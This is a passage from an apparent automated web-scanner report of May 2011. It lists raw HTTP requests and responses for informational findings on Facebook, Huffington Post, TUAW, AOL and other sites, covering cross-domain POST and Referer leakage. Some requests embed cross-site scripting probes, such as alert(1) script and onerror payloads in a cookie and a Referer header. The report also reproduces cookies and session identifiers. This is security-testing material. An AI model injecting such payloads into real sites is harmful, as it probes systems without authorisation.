Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u585927_3"><input value="Login" tabindex="4" type="submit" id="u585927_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/help/contact.php?show_form=cannot_identify&amp;flow=pw_reset" autocomplete="off" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="zTWKd" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial help_form uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">I Cannot Identify My Account</h2></div></div></div><div class="phl ptm uiInterstitialContent"><form method="post" action="https://www.facebook.com/help/contact.php?show_form=cannot_identify&amp;cant_identify=0" id="helpform" onsubmit="return Event.__inlineSubmit(this,event)" enctype="multipart/form-data" class="cannot_identify"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="zTWKd" autocomplete="off" /><input type="hidden" id="redirect" name="redirect" value="http://www.facebook.com/help/?mail_sent" autocomplete="off" /><table id="dialog" border="0" cellspacing="0" width="510"><tbody><tr><td class="dialog"><div class="instructions">Please fill out this form if you are unable to
...[SNIP]...

Request 2

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.193.121
X-Cnection: close
Date: Thu, 05 May 2011 11:45:55 GMT
Content-Length: 23679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u595513_3"><input value="Login" tabindex="4" type="submit" id="u595513_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/help/contact.php?show_form=cannot_identify&amp;flow=pw_reset" autocomplete="off" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="zTWKd" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial help_form uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">I Cannot Identify My Account</h2></div></div></div><div class="phl ptm uiInterstitialContent"><form method="post" action="https://www.facebook.com/help/contact.php?show_form=cannot_identify&amp;cant_identify=0" id="helpform" onsubmit="return Event.__inlineSubmit(this,event)" enctype="multipart/form-data" class="cannot_identify"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="zTWKd" autocomplete="off" /><input type="hidden" id="redirect" name="redirect" value="http://www.facebook.com/help/?mail_sent" autocomplete="off" /><table id="dialog" border="0" cellspacing="0" width="510"><tbody><tr><td class="dialog"><div class="instructions">Please fill out this form if you are unable to
...[SNIP]...

14.12. http://www.huffingtonpost.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.huffingtonpost.com
Path:   /

Request 1

GET / HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __qca=P0-822287727-1304575116403; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.3.10.1304575105

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Set-Cookie: is_aol_user=1; 0; path=/;
Vary: Accept-Encoding
Cache-Control: max-age=24
Date: Thu, 05 May 2011 01:00:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 269167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">








<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
   <meta name="Title" content="The Huffington Post - Breaking News and Opinion" />
   <meta name="Description" content="Breaking News and Opinion" />
   <meta name="Keywords" content="news, breaking news, news blog, business, sports, politics, technology, entertainment, living" />
       <title>Breaking News and Opinion on The Huffington Post</title>
<meta property="og:site_name" content="The Huffington Post"/>
       <meta property="fb:app_id" content="46744042133"/>
<meta property="og:type" content="blog"/>





<link rel="shortcut icon" href="/favicon.ico" />



   
   <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&amp;v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&amp;v46755" type="text/css" medi
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __qca=P0-822287727-1304575116403; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.3.10.1304575105

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=8
Date: Thu, 05 May 2011 01:00:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">






<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
   <meta name="Title" content="The Huffington Post - Breaking News and Opinion" />
   <meta name="Description" content="Breaking News and Opinion" />
   <meta name="Keywords" content="news, breaking news, news blog, business, sports, politics, technology, entertainment, living" />
       <title>Breaking News and Opinion on The Huffington Post</title>
<meta property="og:site_name" content="The Huffington Post"/>
       <meta property="fb:app_id" content="46744042133"/>
<meta property="og:type" content="blog"/>





<link rel="shortcut icon" href="/favicon.ico" />



   
   <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&amp;v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&amp;v46755" type="text/css" media="screen" />                
       
<link rel="alte
...[SNIP]...

14.13. http://www.tuaw.com/hub/app-reviews

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Request 1

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/
Content-Type: text/html
Content-Length: 32604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
<scr' + 'ipt src="http://www.tuaw.com/traffic/' + '?t=js&bv=&os=&tz=&lg=&rv=at.atwola.com%2Fadiframe%2F3.0%2F5113.1%2F221794%2F0%2F-1%2Fsize7b4de%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E118786fa1f1%3D300x250&rsv=at.atwola.com&pw=%2Fhub%2Fapp-reviews%2F&cb=1585101410" type="text/javascript"></scr' + 'ipt>');
// -->
</script><noscript><img src="http://www.tuaw.com/traffic/?t=px&bv=JavaScript+Disabled&os=&tz=default&lg=&rv=at.atwola.com%2Fadiframe%2F3.0%2F5113.1%2F221794%2F0%2F-1%2Fsize7b4de%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E118786fa1f1%3D300x250&rsv=at.atwola.com&pw=%2Fhub%2Fapp-reviews%2F&cb=1927811724" alt="the end" width="1" height="1"border="0" /></noscript>

Request 2

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:20 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:20 GMT; path=/
Content-Type: text/html
Content-Length: 32282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
<scr' + 'ipt src="http://www.tuaw.com/traffic/' + '?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fhub%2Fapp-reviews%2F&cb=997815769" type="text/javascript"></scr' + 'ipt>');
// -->
</script><noscript><img src="http://www.tuaw.com/traffic/?t=px&bv=JavaScript+Disabled&os=&tz=default&lg=&rv=&rsv=&pw=%2Fhub%2Fapp-reviews%2F&cb=101099787" alt="the end" width="1" height="1"border="0" /></noscript>

15. Cross-domain POST
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


15.1. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.aol.com. The form contains the following fields:
  • query
  • submit

Request

GET /?icid=navbar_finance_main5 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
Content-Type: text/html
Content-Length: 126939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<li><form action="http://search.aol.com/aol/search?q=" method="post" name="bb_topform" id="dualsearch" target="_blank">
                       <input type="text" onblur="javascript:if(this.value=='')this.value='Search the Web' ;removecolor();" value="Search the Web" onkeypress="return submitHeaderSearch(event);" onfocus="this.value=
...[SNIP]...

15.2. http://www.dailyfinance.com/markets/mostactives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The page contains a form which POSTs data to the domain search.aol.com. The form contains the following fields:
  • query
  • submit

Request

GET /markets/mostactives HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Content-Language: en
Content-Length: 90327
Keep-Alive: timeout=5, max=1000
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers: Most
...[SNIP]...
<ul id="GH_dualsearchbox" class="GH_hat_UL"><form action="http://search.aol.com/aol/search?q=" method="post" name="bb_topform" id="dualsearch" target="_blank">
                       <input type="text" onblur="javascript:if(this.value=='')this.value='Search the Web' ;removecolor();" value="Search the Web" onkeypress="return submitHeaderSearch(event);" onfocus="this.value='
...[SNIP]...

15.3. http://www.lakewoodbeacon.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lakewoodbeacon.org
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:
  • ea
  • go
  • llr
  • m
  • p

Request

GET / HTTP/1.1
Host: www.lakewoodbeacon.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 03 May 2011 20:48:46 GMT
ETag: "b4a07965-30b8-4a2654432b8de"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<div style="width:160px; background-color: #ffffff;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #666600; float:right;margin-right:5;margin-top:3">
...[SNIP]...

16. Cross-domain Referer leakage
There are 96 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


16.1. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/bdbcc7701dc2de04075043ac486f24d7/woman-man-bed-386ds050311.jpg
  • http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?xid=aol_eh-allergies_41-_20100502
  • http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?xid=aol_eh-chol_8-_20100502
  • http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?xid=aol_eh-parent_53-_20100502
  • http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~3~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575026058-Repeat%7C1367647026058%3B%20s_nrgvo%3DRepeat%7C1367647026064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:16 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-41.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2855
Set-Cookie: JSESSIONID=E5F05FD7FA8545D74DDA7349E8CA720E; Path=/aol
Content-Length: 2855

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-60533 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|60533" href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/bdbcc7701dc2de04075043ac486f24d7/woman-man-bed-386ds050311.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" onclick=" " href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|60533">3 Ways to Reignite Your Sex Life
</a>
...[SNIP]...
